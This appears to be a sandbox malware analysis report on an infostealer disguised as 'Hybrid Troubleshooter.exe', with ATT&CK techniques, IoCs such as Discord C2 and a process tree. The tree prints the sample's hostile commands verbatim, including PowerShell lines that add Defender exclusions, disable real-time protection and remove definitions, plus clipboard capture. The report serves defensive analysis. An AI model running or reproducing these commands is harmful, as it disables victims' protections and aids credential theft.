b3dff4a7df3913a8ba790c89e44526bb71951f7e9ca0d321b026080ff57780ee

Analysis

max time kernel
147s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
04-12-2024 04:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Hybrid Troubleshooter.exe
Size

6.0MB
MD5

7b6bf2e9439976470abed7e28aeb7e50
SHA1

79ced0071d376428aa98d951e2524845bd1d87b1
SHA256

b3dff4a7df3913a8ba790c89e44526bb71951f7e9ca0d321b026080ff57780ee
SHA512

b4e0ebff67876398a38f2ef05c6d3b07443b311298549fa1681c49653b5f018b71f63af7d309ce40c6c2a2084572119c9aa02ffb44d4b4e4046a612ae105fa39
SSDEEP

98304:4jcZrXqkqSnWyL4afkhk9Y+YNwh1SMCJbzRnPJ8iE/56YiaDJ1n6hB0LncZMn:9R9L4ack9Y7m7SMYNPKBFn6hqgi

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
728	powershell.exe
2236	powershell.exe
5036	powershell.exe
4212	powershell.exe
1468	powershell.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x001900000002ab22-21.dat	acprotect
behavioral1/files/0x001900000002ab0f-27.dat	acprotect
behavioral1/files/0x001900000002ab1f-30.dat	acprotect
behavioral1/files/0x001900000002ab15-47.dat	acprotect
behavioral1/files/0x001900000002ab14-46.dat	acprotect
behavioral1/files/0x001900000002ab13-45.dat	acprotect
behavioral1/files/0x001900000002ab12-44.dat	acprotect
behavioral1/files/0x001900000002ab11-43.dat	acprotect
behavioral1/files/0x001900000002ab10-42.dat	acprotect
behavioral1/files/0x001a00000002ab0e-41.dat	acprotect
behavioral1/files/0x001900000002ab2b-40.dat	acprotect
behavioral1/files/0x001900000002ab28-39.dat	acprotect
behavioral1/files/0x001900000002ab27-38.dat	acprotect
behavioral1/files/0x001900000002ab21-35.dat	acprotect
behavioral1/files/0x001900000002ab1e-34.dat	acprotect
behavioral1/files/0x001900000002ab16-48.dat	acprotect

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2908	cmd.exe
2460	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2404	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe
3316	Hybrid Troubleshooter.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
3	discord.com
5	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2308	tasklist.exe
2364	tasklist.exe
4084	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ab22-21.dat	upx
behavioral1/memory/3316-25-0x0000000074750000-0x0000000074C5A000-memory.dmp	upx
behavioral1/files/0x001900000002ab0f-27.dat	upx
behavioral1/memory/3316-29-0x00000000746E0000-0x00000000746FF000-memory.dmp	upx
behavioral1/files/0x001900000002ab1f-30.dat	upx
behavioral1/files/0x001900000002ab15-47.dat	upx
behavioral1/files/0x001900000002ab14-46.dat	upx
behavioral1/files/0x001900000002ab13-45.dat	upx
behavioral1/files/0x001900000002ab12-44.dat	upx
behavioral1/files/0x001900000002ab11-43.dat	upx
behavioral1/files/0x001900000002ab10-42.dat	upx
behavioral1/files/0x001a00000002ab0e-41.dat	upx
behavioral1/files/0x001900000002ab2b-40.dat	upx
behavioral1/files/0x001900000002ab28-39.dat	upx
behavioral1/files/0x001900000002ab27-38.dat	upx
behavioral1/files/0x001900000002ab21-35.dat	upx
behavioral1/files/0x001900000002ab1e-34.dat	upx
behavioral1/files/0x001900000002ab16-48.dat	upx
behavioral1/memory/3316-32-0x00000000746D0000-0x00000000746DD000-memory.dmp	upx
behavioral1/memory/3316-54-0x00000000746A0000-0x00000000746C7000-memory.dmp	upx
behavioral1/memory/3316-56-0x0000000074680000-0x0000000074698000-memory.dmp	upx
behavioral1/memory/3316-58-0x0000000074660000-0x000000007467B000-memory.dmp	upx
behavioral1/memory/3316-60-0x0000000074520000-0x0000000074656000-memory.dmp	upx
behavioral1/memory/3316-62-0x0000000074500000-0x0000000074516000-memory.dmp	upx
behavioral1/memory/3316-64-0x00000000744C0000-0x00000000744CC000-memory.dmp	upx
behavioral1/memory/3316-66-0x0000000074490000-0x00000000744B8000-memory.dmp	upx
behavioral1/memory/3316-74-0x00000000746E0000-0x00000000746FF000-memory.dmp	upx
behavioral1/memory/3316-72-0x0000000074190000-0x00000000743EA000-memory.dmp	upx
behavioral1/memory/3316-71-0x00000000743F0000-0x0000000074484000-memory.dmp	upx
behavioral1/memory/3316-70-0x0000000074750000-0x0000000074C5A000-memory.dmp	upx
behavioral1/memory/3316-76-0x0000000074130000-0x0000000074140000-memory.dmp	upx
behavioral1/memory/3316-79-0x0000000074120000-0x000000007412C000-memory.dmp	upx
behavioral1/memory/3316-78-0x00000000746A0000-0x00000000746C7000-memory.dmp	upx
behavioral1/memory/3316-83-0x0000000074680000-0x0000000074698000-memory.dmp	upx
behavioral1/memory/3316-84-0x0000000074000000-0x0000000074118000-memory.dmp	upx
behavioral1/memory/3316-115-0x0000000074660000-0x000000007467B000-memory.dmp	upx
behavioral1/memory/3316-164-0x0000000074520000-0x0000000074656000-memory.dmp	upx
behavioral1/memory/3316-181-0x0000000074500000-0x0000000074516000-memory.dmp	upx
behavioral1/memory/3316-221-0x0000000074490000-0x00000000744B8000-memory.dmp	upx
behavioral1/memory/3316-244-0x00000000743F0000-0x0000000074484000-memory.dmp	upx
behavioral1/memory/3316-246-0x0000000074190000-0x00000000743EA000-memory.dmp	upx
behavioral1/memory/3316-320-0x00000000746E0000-0x00000000746FF000-memory.dmp	upx
behavioral1/memory/3316-319-0x0000000074750000-0x0000000074C5A000-memory.dmp	upx
behavioral1/memory/3316-325-0x0000000074520000-0x0000000074656000-memory.dmp	upx
behavioral1/memory/3316-334-0x0000000074120000-0x000000007412C000-memory.dmp	upx
behavioral1/memory/3316-370-0x0000000074750000-0x0000000074C5A000-memory.dmp	upx
behavioral1/memory/3316-394-0x00000000743F0000-0x0000000074484000-memory.dmp	upx
behavioral1/memory/3316-395-0x0000000074190000-0x00000000743EA000-memory.dmp	upx
behavioral1/memory/3316-393-0x0000000074490000-0x00000000744B8000-memory.dmp	upx
behavioral1/memory/3316-392-0x00000000744C0000-0x00000000744CC000-memory.dmp	upx
behavioral1/memory/3316-391-0x0000000074500000-0x0000000074516000-memory.dmp	upx
behavioral1/memory/3316-390-0x0000000074520000-0x0000000074656000-memory.dmp	upx
behavioral1/memory/3316-389-0x0000000074660000-0x000000007467B000-memory.dmp	upx
behavioral1/memory/3316-388-0x0000000074680000-0x0000000074698000-memory.dmp	upx
behavioral1/memory/3316-387-0x00000000746A0000-0x00000000746C7000-memory.dmp	upx
behavioral1/memory/3316-386-0x00000000746D0000-0x00000000746DD000-memory.dmp	upx
behavioral1/memory/3316-385-0x00000000746E0000-0x00000000746FF000-memory.dmp	upx
behavioral1/memory/3316-384-0x0000000074000000-0x0000000074118000-memory.dmp	upx
behavioral1/memory/3316-383-0x0000000074120000-0x000000007412C000-memory.dmp	upx
behavioral1/memory/3316-382-0x0000000074130000-0x0000000074140000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hybrid Troubleshooter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getmac.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hybrid Troubleshooter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
8	cmd.exe
3768	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2408	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4436	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
728	powershell.exe
1468	powershell.exe
4212	powershell.exe
728	powershell.exe
728	powershell.exe
4212	powershell.exe
4212	powershell.exe
1468	powershell.exe
1468	powershell.exe
2460	powershell.exe
2460	powershell.exe
3464	powershell.exe
3464	powershell.exe
2460	powershell.exe
3464	powershell.exe
2236	powershell.exe
2236	powershell.exe
4900	powershell.exe
4900	powershell.exe
5036	powershell.exe
5036	powershell.exe
4388	powershell.exe
4388	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	728	powershell.exe
Token: SeDebugPrivilege	4212	powershell.exe
Token: SeDebugPrivilege	2364	tasklist.exe
Token: SeDebugPrivilege	2308	tasklist.exe
Token: SeDebugPrivilege	4084	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3448	WMIC.exe
Token: SeSecurityPrivilege	3448	WMIC.exe
Token: SeTakeOwnershipPrivilege	3448	WMIC.exe
Token: SeLoadDriverPrivilege	3448	WMIC.exe
Token: SeSystemProfilePrivilege	3448	WMIC.exe
Token: SeSystemtimePrivilege	3448	WMIC.exe
Token: SeProfSingleProcessPrivilege	3448	WMIC.exe
Token: SeIncBasePriorityPrivilege	3448	WMIC.exe
Token: SeCreatePagefilePrivilege	3448	WMIC.exe
Token: SeBackupPrivilege	3448	WMIC.exe
Token: SeRestorePrivilege	3448	WMIC.exe
Token: SeShutdownPrivilege	3448	WMIC.exe
Token: SeDebugPrivilege	3448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3448	WMIC.exe
Token: SeRemoteShutdownPrivilege	3448	WMIC.exe
Token: SeUndockPrivilege	3448	WMIC.exe
Token: SeManageVolumePrivilege	3448	WMIC.exe
Token: 33	3448	WMIC.exe
Token: 34	3448	WMIC.exe
Token: 35	3448	WMIC.exe
Token: 36	3448	WMIC.exe
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeIncreaseQuotaPrivilege	3448	WMIC.exe
Token: SeSecurityPrivilege	3448	WMIC.exe
Token: SeTakeOwnershipPrivilege	3448	WMIC.exe
Token: SeLoadDriverPrivilege	3448	WMIC.exe
Token: SeSystemProfilePrivilege	3448	WMIC.exe
Token: SeSystemtimePrivilege	3448	WMIC.exe
Token: SeProfSingleProcessPrivilege	3448	WMIC.exe
Token: SeIncBasePriorityPrivilege	3448	WMIC.exe
Token: SeCreatePagefilePrivilege	3448	WMIC.exe
Token: SeBackupPrivilege	3448	WMIC.exe
Token: SeRestorePrivilege	3448	WMIC.exe
Token: SeShutdownPrivilege	3448	WMIC.exe
Token: SeDebugPrivilege	3448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3448	WMIC.exe
Token: SeRemoteShutdownPrivilege	3448	WMIC.exe
Token: SeUndockPrivilege	3448	WMIC.exe
Token: SeManageVolumePrivilege	3448	WMIC.exe
Token: 33	3448	WMIC.exe
Token: 34	3448	WMIC.exe
Token: 35	3448	WMIC.exe
Token: 36	3448	WMIC.exe
Token: SeDebugPrivilege	3464	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	4900	powershell.exe
Token: SeIncreaseQuotaPrivilege	1260	WMIC.exe
Token: SeSecurityPrivilege	1260	WMIC.exe
Token: SeTakeOwnershipPrivilege	1260	WMIC.exe
Token: SeLoadDriverPrivilege	1260	WMIC.exe
Token: SeSystemProfilePrivilege	1260	WMIC.exe
Token: SeSystemtimePrivilege	1260	WMIC.exe
Token: SeProfSingleProcessPrivilege	1260	WMIC.exe
Token: SeIncBasePriorityPrivilege	1260	WMIC.exe
Token: SeCreatePagefilePrivilege	1260	WMIC.exe
Token: SeBackupPrivilege	1260	WMIC.exe
Token: SeRestorePrivilege	1260	WMIC.exe
Token: SeShutdownPrivilege	1260	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3376 wrote to memory of 3316	3376	Hybrid Troubleshooter.exe	77
PID 3376 wrote to memory of 3316	3376	Hybrid Troubleshooter.exe	77
PID 3376 wrote to memory of 3316	3376	Hybrid Troubleshooter.exe	77
PID 3316 wrote to memory of 2748	3316	Hybrid Troubleshooter.exe	78
PID 3316 wrote to memory of 2748	3316	Hybrid Troubleshooter.exe	78
PID 3316 wrote to memory of 2748	3316	Hybrid Troubleshooter.exe	78
PID 3316 wrote to memory of 3408	3316	Hybrid Troubleshooter.exe	79
PID 3316 wrote to memory of 3408	3316	Hybrid Troubleshooter.exe	79
PID 3316 wrote to memory of 3408	3316	Hybrid Troubleshooter.exe	79
PID 3316 wrote to memory of 1084	3316	Hybrid Troubleshooter.exe	80
PID 3316 wrote to memory of 1084	3316	Hybrid Troubleshooter.exe	80
PID 3316 wrote to memory of 1084	3316	Hybrid Troubleshooter.exe	80
PID 1084 wrote to memory of 4212	1084	cmd.exe	84
PID 1084 wrote to memory of 4212	1084	cmd.exe	84
PID 1084 wrote to memory of 4212	1084	cmd.exe	84
PID 2748 wrote to memory of 1468	2748	cmd.exe	85
PID 2748 wrote to memory of 1468	2748	cmd.exe	85
PID 2748 wrote to memory of 1468	2748	cmd.exe	85
PID 3408 wrote to memory of 728	3408	cmd.exe	86
PID 3408 wrote to memory of 728	3408	cmd.exe	86
PID 3408 wrote to memory of 728	3408	cmd.exe	86
PID 3316 wrote to memory of 32	3316	Hybrid Troubleshooter.exe	87
PID 3316 wrote to memory of 32	3316	Hybrid Troubleshooter.exe	87
PID 3316 wrote to memory of 32	3316	Hybrid Troubleshooter.exe	87
PID 3316 wrote to memory of 4492	3316	Hybrid Troubleshooter.exe	88
PID 3316 wrote to memory of 4492	3316	Hybrid Troubleshooter.exe	88
PID 3316 wrote to memory of 4492	3316	Hybrid Troubleshooter.exe	88
PID 4492 wrote to memory of 2308	4492	cmd.exe	91
PID 4492 wrote to memory of 2308	4492	cmd.exe	91
PID 4492 wrote to memory of 2308	4492	cmd.exe	91
PID 32 wrote to memory of 2364	32	cmd.exe	92
PID 32 wrote to memory of 2364	32	cmd.exe	92
PID 32 wrote to memory of 2364	32	cmd.exe	92
PID 3316 wrote to memory of 4196	3316	Hybrid Troubleshooter.exe	93
PID 3316 wrote to memory of 4196	3316	Hybrid Troubleshooter.exe	93
PID 3316 wrote to memory of 4196	3316	Hybrid Troubleshooter.exe	93
PID 3316 wrote to memory of 2908	3316	Hybrid Troubleshooter.exe	94
PID 3316 wrote to memory of 2908	3316	Hybrid Troubleshooter.exe	94
PID 3316 wrote to memory of 2908	3316	Hybrid Troubleshooter.exe	94
PID 3316 wrote to memory of 4756	3316	Hybrid Troubleshooter.exe	97
PID 3316 wrote to memory of 4756	3316	Hybrid Troubleshooter.exe	97
PID 3316 wrote to memory of 4756	3316	Hybrid Troubleshooter.exe	97
PID 3316 wrote to memory of 3964	3316	Hybrid Troubleshooter.exe	98
PID 3316 wrote to memory of 3964	3316	Hybrid Troubleshooter.exe	98
PID 3316 wrote to memory of 3964	3316	Hybrid Troubleshooter.exe	98
PID 3316 wrote to memory of 8	3316	Hybrid Troubleshooter.exe	99
PID 3316 wrote to memory of 8	3316	Hybrid Troubleshooter.exe	99
PID 3316 wrote to memory of 8	3316	Hybrid Troubleshooter.exe	99
PID 3316 wrote to memory of 3936	3316	Hybrid Troubleshooter.exe	101
PID 3316 wrote to memory of 3936	3316	Hybrid Troubleshooter.exe	101
PID 3316 wrote to memory of 3936	3316	Hybrid Troubleshooter.exe	101
PID 3316 wrote to memory of 3372	3316	Hybrid Troubleshooter.exe	104
PID 3316 wrote to memory of 3372	3316	Hybrid Troubleshooter.exe	104
PID 3316 wrote to memory of 3372	3316	Hybrid Troubleshooter.exe	104
PID 4756 wrote to memory of 4084	4756	cmd.exe	108
PID 4756 wrote to memory of 4084	4756	cmd.exe	108
PID 4756 wrote to memory of 4084	4756	cmd.exe	108
PID 4196 wrote to memory of 3448	4196	cmd.exe	109
PID 4196 wrote to memory of 3448	4196	cmd.exe	109
PID 4196 wrote to memory of 3448	4196	cmd.exe	109
PID 3936 wrote to memory of 4436	3936	cmd.exe	110
PID 3936 wrote to memory of 4436	3936	cmd.exe	110
PID 3936 wrote to memory of 4436	3936	cmd.exe	110
PID 8 wrote to memory of 3768	8	cmd.exe	111

C:\Users\Admin\AppData\Local\Temp\Hybrid Troubleshooter.exe
"C:\Users\Admin\AppData\Local\Temp\Hybrid Troubleshooter.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3376
- C:\Users\Admin\AppData\Local\Temp\Hybrid Troubleshooter.exe
  "C:\Users\Admin\AppData\Local\Temp\Hybrid Troubleshooter.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hybrid Troubleshooter.exe'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2748
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hybrid Troubleshooter.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3408
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ .scr'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1084
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:32
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4492
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4196
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - System Location Discovery: System Language Discovery
    PID:2908
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4756
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
